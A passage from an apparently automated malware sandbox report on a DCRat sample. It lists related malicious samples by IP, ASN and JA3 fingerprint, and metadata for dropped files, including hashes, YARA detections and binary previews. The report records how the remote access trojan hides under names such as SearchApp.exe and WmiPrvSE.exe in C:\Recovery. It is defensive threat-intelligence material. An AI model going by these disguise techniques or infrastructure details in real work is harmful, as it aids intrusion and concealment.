	RFQ_64182MR_PDF.R00.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Circular_no_088_Annexure_pdf.html	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	RTGS_UCB_DCCB_docx.html	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	WBPWLAj09q.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Adeleidae.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	rRFQNO-N__MERODOPEDIDO106673.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	REVISED INVOICE.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Produccion.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	226999705-124613-sanlccjavap0004-67.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	BT-036016002U_RFQ 014-010-02024.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	RFQ_64182MR_PDF.R00.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Circular_no_088_Annexure_pdf.html	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	RTGS_UCB_DCCB_docx.html	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	WBPWLAj09q.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Adeleidae.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	rRFQNO-N__MERODOPEDIDO106673.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	file.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	34.117.188.166
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	botnet.m68k.elf	Get hash	malicious	Mirai, Moobot	Browse	34.116.104.42
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
TIMEWEB-ASRU	phc.exe	Get hash	malicious	Unknown	Browse	92.53.116.138
	Simple.exe	Get hash	malicious	Unknown	Browse	92.53.116.138
	Stacks.exe	Get hash	malicious	Unknown	Browse	92.53.116.138
	Tcbnyqc7Cr.exe	Get hash	malicious	DCRat	Browse	185.114.247.170
	YxRMWWHAA2.exe	Get hash	malicious	DCRat	Browse	185.114.247.170
	Layer.exe	Get hash	malicious	Unknown	Browse	92.53.116.138
	okLjQnQIef.exe	Get hash	malicious	DCRat	Browse	185.114.247.170
	jD1RqkyUNm.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	92.53.106.114
	OuaJzAFCTk.exe	Get hash	malicious	DCRat	Browse	185.114.247.170
	SaHGyIaVww.exe	Get hash	malicious	DCRat	Browse	185.114.247.170

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Get hash	malicious	DarkCloud	Browse	149.154.167.220 34.117.59.81
	https://www.yola.com/es/zendesk-sso?return_to=http://york.iwill.app.br/	Get hash	malicious	Unknown	Browse	149.154.167.220 34.117.59.81
	Produccion.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220 34.117.59.81
	xVmySfWfcW.exe	Get hash	malicious	Unknown	Browse	149.154.167.220 34.117.59.81
	226999705-124613-sanlccjavap0004-67.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220 34.117.59.81
	LDlanZur0i.exe	Get hash	malicious	Unknown	Browse	149.154.167.220 34.117.59.81
	Fa1QSXjTZD.exe	Get hash	malicious	Unknown	Browse	149.154.167.220 34.117.59.81
	xxImTScxAq.exe	Get hash	malicious	Unknown	Browse	149.154.167.220 34.117.59.81
	4aOgNkVU5z.exe	Get hash	malicious	Unknown	Browse	149.154.167.220 34.117.59.81
	xVmySfWfcW.exe	Get hash	malicious	Unknown	Browse	149.154.167.220 34.117.59.81

Process:	C:\Users\user\Desktop\kQyd2z80gD.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	212
Entropy (8bit):	5.758926929313447
Encrypted:	false
SSDEEP:	3:/BlMhtapVdFcqhJVqOQRwWlLMyQkRpnUtNlR08CI3FaDO8R93gn7kRh7lZ9Pn:pChtW2RJL/5Ubw8CI3Fai8MkR3j
MD5:	A10346B7C6A51267A4C0FBB7DC6CEC07
SHA1:	97FE961AAA5104A713BD7133C01BA7842B9E3C60
SHA-256:	77F1F65F7B1CAA411E568186C7B93BD2BCB2A2B24AF98CB93D85BF932475F130
SHA-512:	B3F66BBF72D8DA607C3FEBE331918BB2E28AD33AEC5000E832A2CCD4409DB1CD9666B437D195056B5E8D25845C720DECC406529732367578B0EF1B68AACDBA39
Malicious:	false
Preview:	as0NGkrUSuNN2D4im0Tdg8q8s0t1AAHxrYVapAKEO8VUNxWFMjmkyJpcB1fQ00TSmZgdsd2lpOOimVu4eoobXg9hs3Yyf3OYpDryQ2XsrA4j4H0qGkwML15Ga8vzEEGwA03jn6omR5uWlZnlDsr5GBMxIlYSGhnm4IjDNRCK6K4PHjfAVKwWXLq8oGaChVftRHbd0jXwpg85G6qjFX65

C:\Recovery\38384e6a620884

Download File

Process:	C:\Users\user\Desktop\kQyd2z80gD.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	132
Entropy (8bit):	5.522984934650288
Encrypted:	false
SSDEEP:	3:nOQu6MoU9KXp1QGQlH9TcONADSDUDa7VvPOCtmcXfS8:ohKXpa9tySADapvPrt3fS8
MD5:	F200BEC7A6645BA5327831BDCFB4419C
SHA1:	602F43B4E534045CF47EA89C721F14B67F017C77
SHA-256:	0BF843900DFAED0C96F7A03E26B606412574880EFFBDF1C83A5387E57BB7A558
SHA-512:	097252DDCFDBE24704A102DB83CAFEEA1C4B6F3FEC22CDEDC289FF46820A13F4B2D86D4090D14C71B34F32BFC245A74FC49AD31D2909E81DD4891C31A1436540
Malicious:	false
Preview:	0AmkpL79HCKvx9q0Mu2ra16JYj7A2sBQJP5p3YQ59qbDNLIvlZgrrsr8DcLFO7HYB3lhDA6xd7sta36NbLZcMTibh7mbNLrBjCCTjkrkdsOuA7hKg7nCioMrVKAGYfkRQqKX

C:\Recovery\5140eeb670c7f4

Download File

Process:	C:\Users\user\Desktop\kQyd2z80gD.exe
File Type:	ASCII text, with very long lines (832), with no line terminators
Category:	dropped
Size (bytes):	832
Entropy (8bit):	5.903096790002194
Encrypted:	false
SSDEEP:	24:i7WNVdKcY9drzXuVIW778iAmNcMLNclokHbMz+Ujq:i7WNTS7Xu+W77JAyN4Utq
MD5:	95FB16F7FE21AB58FEA1282E59C1120B
SHA1:	A4606141D150C54E4FDD1FC8049BE50B97EAE7DF
SHA-256:	C11D4353E3170409DEE6184C8F28AD43EC2232C6EA4C87AC88511AA21D4808A5
SHA-512:	4913CB9E3861B1AA7A44C414928A3E662E6378504BD91CD7C40686B562BFA8DDBFC40B99402EA8329211D367AE4FEA0038B2E5363B4A4F620F1F01329570D76C
Malicious:	false
Preview:	yvDOyCMlHypf4Jin65CkVq4T9BDOBXB3gaMKaUQLPNQm4wxXwe3owqdH1tOw97juwv8d6YMlo0UIaRZNOpchdXG06FTrFeMRnf0JxTbXRS96VVrjUBhUfCQZoIh1EfgKoDe4bPa5NEPLXKekXuXE62wlPafpvjTwvzSS1wHElmGawFCdn6dUHbOwQ2pBuuJnvdZh2LtlmSdTvWzKYBBzG8oTkfC8HGU0dcoSpelcN2sy84A4DfnssUhxzF7WJvdg8m0Trge3ajmNQzVqfH5mdlHJ41djhOTcYL0WErNgAtSJrUh9uR1Bz1DWfrYzD5WLQKyE89ly4YltT7bkUezQXSmhIe0XSXdFWG3hfcAvpCGbPTChPxfiFGy7hQ6eIOfh4gXNE3E1dDkULKSybTHf149QR5APfgnbhjhs6zdWtoFCfdwX8ICyGAp9hG5I3zW6aJxmnj2l0vvNz7vyJmQXdyUg3hLz4Uc3RIlVqKtZPb8VOcKjVH9Qj8dmzQsGXDrgS25qWZH831IC09SaWmdxULUTp9gZbnBMtbCWhdN59AXr0bvz8Stvj4LGhlBW3shPz5SY6532YiyTymdNNqbJ4QnzQ5y5c0CRdI24IX2CY0XAF1S5IxJMQXUjSdIBG8ahfh0puiF0yYuE3mtYn3wprzAFxTmpO15ZZzeiBmKkrSY2mQqpttXNMvzpgu2a6al6cVoDHKWAsM7ZbHchm65edsNo9zCRutnRrbZRlmiiXXe9yaOYRUy9eGdtHADSIFQ8ips9sK6AYWHGON0ikn9Z5oxk8pKkiPaRGfbIsOqGXxlH9Wf3KerfF0C42HACAVbI

C:\Recovery\SearchApp.exe

Download File

Process:	C:\Users\user\Desktop\kQyd2z80gD.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	530432
Entropy (8bit):	5.389951309114567
Encrypted:	false
SSDEEP:	12288:tZ2N7BcysKLDraDdvdx5gqJSpxw3+i4rF/Fx:tZ2cvYaLxuqSN
MD5:	4A3BF58E23A86EA73D2F1D8BA04E7467
SHA1:	88099E13C38F4ADFEF4A64CA91B681C8CFA85834
SHA-256:	BA30EAF70B11268ACCB528CE65CEA53A3EC811D2E368E4A3D19EBDFAF02CC233
SHA-512:	DD2FFED4FA44C5A81DB9898B57488996165B9B58A0C30176B335CBC81D74FB86541645E0167AC58F73DE547DEDF4BA9ED419477E17F170F10A8472F106A2D9C5
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Recovery\SearchApp.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Recovery\SearchApp.exe, Author: Joe Security Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Recovery\SearchApp.exe, Author: ditekSHen Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Recovery\SearchApp.exe, Author: ditekSHen Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Recovery\SearchApp.exe, Author: ditekSHen Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Recovery\SearchApp.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..........".................N/... ...@....@.. ....................................@.....................................S....@.......................`....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................0/......H.......H....)..........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Recovery\SearchApp.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\kQyd2z80gD.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Recovery\WmiPrvSE.exe

Download File

Process:	C:\Users\user\Desktop\kQyd2z80gD.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	530432
Entropy (8bit):	5.389951309114567
Encrypted:	false
SSDEEP:	12288:tZ2N7BcysKLDraDdvdx5gqJSpxw3+i4rF/Fx:tZ2cvYaLxuqSN
MD5:	4A3BF58E23A86EA73D2F1D8BA04E7467
SHA1:	88099E13C38F4ADFEF4A64CA91B681C8CFA85834
SHA-256:	BA30EAF70B11268ACCB528CE65CEA53A3EC811D2E368E4A3D19EBDFAF02CC233
SHA-512:	DD2FFED4FA44C5A81DB9898B57488996165B9B58A0C30176B335CBC81D74FB86541645E0167AC58F73DE547DEDF4BA9ED419477E17F170F10A8472F106A2D9C5
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Recovery\WmiPrvSE.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Recovery\WmiPrvSE.exe, Author: Joe Security Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Recovery\WmiPrvSE.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..........".................N/... ...@....@.. ....................................@.....................................S....@.......................`....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................0/......H.......H....)..........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Recovery\WmiPrvSE.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\kQyd2z80gD.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe

Download File

Process:	C:\Users\user\Desktop\kQyd2z80gD.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	530432
Entropy (8bit):	5.389951309114567
Encrypted:	false
SSDEEP:	12288:tZ2N7BcysKLDraDdvdx5gqJSpxw3+i4rF/Fx:tZ2cvYaLxuqSN
MD5:	4A3BF58E23A86EA73D2F1D8BA04E7467
SHA1:	88099E13C38F4ADFEF4A64CA91B681C8CFA85834
SHA-256:	BA30EAF70B11268ACCB528CE65CEA53A3EC811D2E368E4A3D19EBDFAF02CC233
SHA-512:	DD2FFED4FA44C5A81DB9898B57488996165B9B58A0C30176B335CBC81D74FB86541645E0167AC58F73DE547DEDF4BA9ED419477E17F170F10A8472F106A2D9C5
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe, Author: Joe Security Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..........".................N/... ...@....@.. ....................................@.....................................S....@.......................`....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................0/......H.......H....)..........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\kQyd2z80gD.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\Default\5140eeb670c7f4

Download File

Process:	C:\Users\user\Desktop\kQyd2z80gD.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	238
Entropy (8bit):	5.811635626154197
Encrypted:	false
SSDEEP:	6:hQXKNV5DBDPQCcxzGaDuStKOIW23TRRlKUktvdy8ceXn:hthiZxzGaaS4OIWmRTw1ceX
MD5:	358052AB1EA46A7C79457A957CA2FC1A
SHA1:	41D2C7A3E558EFBD5937A27311E8C068C472B2D8
SHA-256:	9C89F7961C2449D4DD7E1C6295AD83D1E3E01262FA93A92FE029A01EB116C5B5
SHA-512:	3F1B9FF9CC2711FEFFF2B18A9C5F6EA0C3C9C268091C3A9F254A01ADCA9A392FEDA102B3F5EEB43A02C2B77C09F7796125D41C5691B1DB297A27AD6B88D8E26D
Malicious:	false
Preview:	qMKd1kOhtjbesCEgY7wPaJfshph6jqiBtujLQ4TX3UWXury61yDxROxhqc5MCS7DBZu7d3QeoYVFwI701kFunvtf7Bey8HUlWTVU60d7iiI22rvieFUcNNaPpPAbYcghEuscwn3AHHMEm1mPQ6U2w2XJ3ForzBjGCkyI9Sv1LTUFBVmynvLcHnvLWjjr8MLFiFBCCdP7LcrchRIhczED0H8ZzmvZtE29IPh5TkvJfORp6S

C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe

Download File

Process:	C:\Users\user\Desktop\kQyd2z80gD.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	530432
Entropy (8bit):	5.389951309114567
Encrypted:	false
SSDEEP:	12288:tZ2N7BcysKLDraDdvdx5gqJSpxw3+i4rF/Fx:tZ2cvYaLxuqSN
MD5:	4A3BF58E23A86EA73D2F1D8BA04E7467
SHA1:	88099E13C38F4ADFEF4A64CA91B681C8CFA85834
SHA-256:	BA30EAF70B11268ACCB528CE65CEA53A3EC811D2E368E4A3D19EBDFAF02CC233
SHA-512:	DD2FFED4FA44C5A81DB9898B57488996165B9B58A0C30176B335CBC81D74FB86541645E0167AC58F73DE547DEDF4BA9ED419477E17F170F10A8472F106A2D9C5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..........".................N/... ...@....@.. ....................................@.....................................S....@.......................`....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................0/......H.......H....)..........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\kQyd2z80gD.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SearchApp.exe.log

Download File

Process:	C:\Recovery\SearchApp.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\WmiPrvSE.exe.log

Download File

Process:	C:\Recovery\WmiPrvSE.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dLErkomWRcaRguaKAMtYMnt.exe.log

Download File

Process:	C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\kQyd2z80gD.exe.log

Download File

Process:	C:\Users\user\Desktop\kQyd2z80gD.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1740
Entropy (8bit):	5.36827240602657
Encrypted:	false
SSDEEP:	48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkhtpaqZ4x
MD5:	B28E0CCD25623D173B2EB29F3A99B9DD
SHA1:	070E4C4A7F903505259E41AFDF7873C31F90D591
SHA-256:	3A108902F93EF9E952D9E748207778718A2CBAEB0AB39C41BD37E9BB0B85BF3A
SHA-512:	17F5FBF18EE0058F928A4D7C53AA4B1191BA3110EDF8E853F145D720381FCEA650A3C997E3D56597150149771E14C529F1BDFDC4A2BBD3719336259C4DD8B342
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
